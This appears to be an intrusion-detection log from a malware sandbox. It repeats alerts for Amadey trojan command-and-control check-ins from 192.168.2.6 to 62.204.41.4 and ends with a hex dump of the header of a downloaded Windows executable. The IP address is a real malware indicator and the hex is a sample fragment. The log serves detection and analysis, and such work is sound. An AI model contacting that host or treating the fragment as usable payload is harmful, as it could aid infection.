Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450343802027700 02/07/23-20:03:45.134037
SID:	2027700
Source Port:	50343
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450182802027700 02/07/23-20:03:03.137173
SID:	2027700
Source Port:	50182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449795802027700 02/07/23-20:01:11.503277
SID:	2027700
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450124802027700 02/07/23-20:02:45.914007
SID:	2027700
Source Port:	50124
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449854802027700 02/07/23-20:01:26.635794
SID:	2027700
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450307802027700 02/07/23-20:03:36.268284
SID:	2027700
Source Port:	50307
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449895802027700 02/07/23-20:01:38.089700
SID:	2027700
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449932802027700 02/07/23-20:01:50.862632
SID:	2027700
Source Port:	49932
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450302802027700 02/07/23-20:03:35.050150
SID:	2027700
Source Port:	50302
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450473802027700 02/07/23-20:04:16.958101
SID:	2027700
Source Port:	50473
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449846802027700 02/07/23-20:01:23.606581
SID:	2027700
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450465802027700 02/07/23-20:04:14.989652
SID:	2027700
Source Port:	50465
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450070802027700 02/07/23-20:02:31.982508
SID:	2027700
Source Port:	50070
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449935802027700 02/07/23-20:01:51.579500
SID:	2027700
Source Port:	49935
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450076802027700 02/07/23-20:02:33.409323
SID:	2027700
Source Port:	50076
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450165802027700 02/07/23-20:02:59.233846
SID:	2027700
Source Port:	50165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450376802027700 02/07/23-20:03:53.252674
SID:	2027700
Source Port:	50376
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449892802027700 02/07/23-20:01:37.344208
SID:	2027700
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449953802027700 02/07/23-20:01:56.032155
SID:	2027700
Source Port:	49953
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449757802027700 02/07/23-20:01:00.338641
SID:	2027700
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449981802027700 02/07/23-20:02:02.719021
SID:	2027700
Source Port:	49981
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450137802027700 02/07/23-20:02:52.411572
SID:	2027700
Source Port:	50137
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450131802027700 02/07/23-20:02:50.831579
SID:	2027700
Source Port:	50131
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449864802027700 02/07/23-20:01:30.634611
SID:	2027700
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449907802027700 02/07/23-20:01:41.092787
SID:	2027700
Source Port:	49907
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450042802027700 02/07/23-20:02:21.298484
SID:	2027700
Source Port:	50042
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450198802027700 02/07/23-20:03:07.083063
SID:	2027700
Source Port:	50198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450048802027700 02/07/23-20:02:22.753627
SID:	2027700
Source Port:	50048
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449775802027700 02/07/23-20:01:04.516285
SID:	2027700
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450287802027700 02/07/23-20:03:31.342737
SID:	2027700
Source Port:	50287
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628
SID:	2027700
Source Port:	50220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612
SID:	2027700
Source Port:	50315
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522
SID:	2027700
Source Port:	50226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451
SID:	2027700
Source Port:	50394
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394
SID:	2027700
Source Port:	50119
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907
SID:	2027700
Source Port:	50208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465
SID:	2027700
Source Port:	50404
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814
SID:	2027700
Source Port:	50060
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701
SID:	2027700
Source Port:	50103
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519
SID:	2027700
Source Port:	50109
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581
SID:	2027700
Source Port:	49969
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327
SID:	2027700
Source Port:	50080
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253
SID:	2027700
Source Port:	49874
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584
SID:	2027700
Source Port:	49963
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926
SID:	2027700
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259
SID:	2027700
Source Port:	50210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388
SID:	2027700
Source Port:	50032
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730
SID:	2027700
Source Port:	50014
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107
SID:	2027700
Source Port:	50121
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584
SID:	2027700
Source Port:	50338
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324
SID:	2027700
Source Port:	50427
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794
SID:	2027700
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798
SID:	2027700
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894
SID:	2027700
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618
SID:	2027700
Source Port:	49979
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441
SID:	2027700
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220
SID:	2027700
Source Port:	49912
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024
SID:	2027700
Source Port:	49994
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639
SID:	2027700
Source Port:	50264
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615
SID:	2027700
Source Port:	50353
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090
SID:	2027700
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823
SID:	2027700
Source Port:	50001
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980
SID:	2027700
Source Port:	50350
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461
SID:	2027700
Source Port:	50172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341
SID:	2027700
Source Port:	50261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561
SID:	2027700
Source Port:	50442
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474
SID:	2027700
Source Port:	50083
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344
SID:	2027700
Source Port:	50086
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867
SID:	2027700
Source Port:	50004
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459
SID:	2027700
Source Port:	50175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023
SID:	2027700
Source Port:	50249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101
SID:	2027700
Source Port:	49925
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462
SID:	2027700
Source Port:	50414
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953
SID:	2027700
Source Port:	50325
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652
SID:	2027700
Source Port:	50455
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103
SID:	2027700
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311
SID:	2027700
Source Port:	49966
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947
SID:	2027700
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537
SID:	2027700
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261
SID:	2027700
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672
SID:	2027700
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041
SID:	2027700
Source Port:	49991
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532
SID:	2027700
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906
SID:	2027700
Source Port:	50058
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345
SID:	2027700
Source Port:	50236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910
SID:	2027700
Source Port:	50017
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393
SID:	2027700
Source Port:	50366
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652
SID:	2027700
Source Port:	50099
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680
SID:	2027700
Source Port:	50147
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702
SID:	2027700
Source Port:	50188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621
SID:	2027700
Source Port:	50277
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184
SID:	2027700
Source Port:	50106
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:51 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 